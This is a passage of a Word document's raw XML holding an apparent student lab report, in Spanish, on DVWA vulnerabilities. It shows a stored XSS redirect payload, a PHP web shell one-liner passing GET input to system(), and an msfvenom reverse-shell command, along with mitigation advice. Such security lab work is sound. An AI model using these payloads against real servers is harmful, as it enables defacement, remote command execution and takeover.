          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">Imagen3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Cambiar cookie en la consola f12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0233F179">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-MX" w:eastAsia="en-US" w:bidi="ar-SA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Propuesta de mitigación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAAE4D6">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Validación del lado del servidor con listas blancas de caracteres permitidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47670A78">
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="360" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Sanit</w:t>
      </w:r>
      <w:r>
        <w:t>ización con DOMPurify (JS) o HTMLPurifier (PHP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25495546">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B41E1E"/>
        </w:rPr>
        <w:t>Vulnerabilidad 2 — XSS Almacenado (Cross-Site Scripting Stored)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4785545D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>1. Descripción de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C51BB4">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El XSS Almacenado (Persistente) es una variante del XSS en la que el payload malicioso es guardado permanentemente en la base de datos. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65093752">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2. Causas de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B101F07">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a. Ausencia de validaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3EEFB9">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>b. Errores de lógica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787EAE27">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La aplicación trata los campos del formulario como datos confiables sin distinguir entre texto plano y código HTML/JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14254C">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>c. Manejo inadecuado de entradas y salidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC0FF5A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>3. Mecanismo de ataque — Redirección persistente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B0893D">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Objetivo: Inyectar en la sección de foros un payload que redirija automáticamente a todos los usuarios a un sitio externo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1639D7B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 1 - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Payload de redirección (campo Message):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74696269">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4716145" cy="2423795"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1460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a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4716145" cy="2423795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BF3C05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Imagen4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Como no alcanza la cantidad de caracteres, con f12 le aumentamos los caracteres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE534CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481320" cy="3425825"/>
            <wp:effectExtent l="0" t="0" r="5080" b="317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a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5481320" cy="3425825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEEBC20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Imagen5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Cambiamos maxlenght de 50 a 100 y ejecutamos el siguiente payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1966721F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>&lt;script&gt;window.location.href="https://google.com";&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C397CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Luego de cargar este payload en Message. La pagina de xss storag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> siempre ridirigira a gogle como se muestra en la imagen6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120F6816">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4990465" cy="3119120"/>
            <wp:effectExtent l="0" t="0" r="8255" b="508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a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4990465" cy="3119120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30999479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Imagen6:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">  XSS redirigiendo a google.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E74884C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Finalmente, para restaurar se debe entrar a mariDB y eliminar la base de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA2798A">
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="360" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>sudo mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3A2143">
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="360" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>passord = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70970F89">
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="360" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>USE dvwa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76554520">
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="360" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>UPDATE guestbook SET comment = REPLACE(comment, '&lt;script&gt;', '') WHERE comment LIKE '%&lt;script&gt;%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C706C6A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>. Propuesta de mitigación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE08F84">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Sanitización en almacenamiento: strip_tags() y htmlspecialchars() antes de insertar en BD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C719037">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Sanitización en recuperación: htmlentities() al extraer datos para mostrarlos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1352C517">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Validación de longitud máxima de campos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C2967">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C655A7D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B41E1E"/>
        </w:rPr>
        <w:t>Vulnerabilidad 3 — Upload Backdoor (File Upload Malicioso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21218820">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>1. Descripción de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E86076">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La vulnerabilidad de subida de archivos maliciosos ocurre cuando una aplicación permite cargar archivos al servidor sin validar correctamente el tipo, extensión o contenido. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF99FD0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2. Causas de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8307AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a. Ausencia de validaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED7351C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>b. Errores de lógica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D01DF67">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>c. Manejo inadecuado de entradas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7CCFBC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>3. Mecanismo de ataque — Shell reversa PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E441E69">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Objetivo: Subir un archivo PHP malicioso y obtener una consola de sistema operativo en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1563E368">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 1 — Crear PHP simple:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E87721">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>danielaguirre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FA93D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 2 — Crear reverse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>con msfvenom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D162C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@kali:~$ msfvenom -p php/reverse_php LHOST=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=4444 -f raw &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>danielaguirre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E22D09">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 3 — Iniciar listener Netcat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8EA8D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5401310" cy="3375660"/>
            <wp:effectExtent l="0" t="0" r="8890" b="762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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
